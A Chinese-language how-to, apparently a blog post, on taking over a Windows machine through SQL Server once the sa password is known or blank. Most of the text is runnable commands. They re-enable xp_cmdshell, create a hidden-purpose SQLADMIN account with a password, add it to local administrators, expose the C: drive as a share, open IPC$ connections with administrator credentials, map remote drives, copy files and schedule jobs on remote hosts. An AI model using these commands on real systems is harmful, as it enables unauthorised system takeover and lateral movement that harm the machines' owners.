通过SQL添加WINDOWS管理员方法

    首先前提是知道对方数据库sa用户的密码，有的人在自己的计算机安装数据的时候，喜欢将数据库密码为空，这样留下的后患就是人家通过连接你的数据库，通过下面指令，可以在你的计算机上添加超级管理员帐号：
 
-- 基于安全考虑,MSSQL2005及以上版本默认禁用了xp_cmdshell。直接调用该扩展存储过程会提示：

-- SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。
-- 系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息，请参阅 SQL Server 联机丛书中的 "外围应用配置器"。
-- 执行以下语句启用xp_cmdshell
-- 将开启语句的第二个1改成0再执行，xp_cmdshell就又处于禁用状态了
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
go
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go

-- 给予CMD管理员权限执行

xp_cmdshell 'runas /user: administrator cmd.exe'

--查看密码密码规则

-- 给SQLADMIN用户分配管理员权限
exec xp_cmdshell 'net localgroup administrators SQLADMIN /add'

-- 删除SQLADMIN用户的管理员权限
exec xp_cmdshell 'net localgroup administrators SQLADMIN /delete'

-- 删除SQLADMIN用户
exec xp_cmdshell 'net user/users SQLADMIN /delete'

-- net share 共享名=路径 设置共享
exec xp_cmdshell 'net share c$=c:'

-- net share 共享名 /delete 删除IPC$共享
exec xp_cmdshell 'net share c$ /delete'

-- 建立远程IPC$连接
net use \\192.168.0.70\IPC$ “********” /user:administrator

-- 映射远程机器共享资源
net use x: \\192.168.0.70\C$

*net user 查看用户列表
*net user 用户名 密码 /add 添加用户
*net user 用户名 密码 更改用户密码
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*net user 用户名 查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户

*net share 查看计算机IPC$共享资源
*net share 共享名 查看该共享的情况
*net share 共享名=路径 设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除IPC$共享

*net use 查看IPC$连接情况
*net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

*net time \\ip 查看远程计算机上的时间

*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上

*net view ip 查看计算机上的共享资源

*ftp 服务器地址 进入FTP服务器

*at 查看自己计算机上的计划作业
*at \\ip 查看远程计算机上的计划作业
*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
*at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
*at \\ip all /delete 删除远程计算机上的全部计划作业

exec xp_cmdshell 'net user SQLADMIN qaz!23#d%e /add'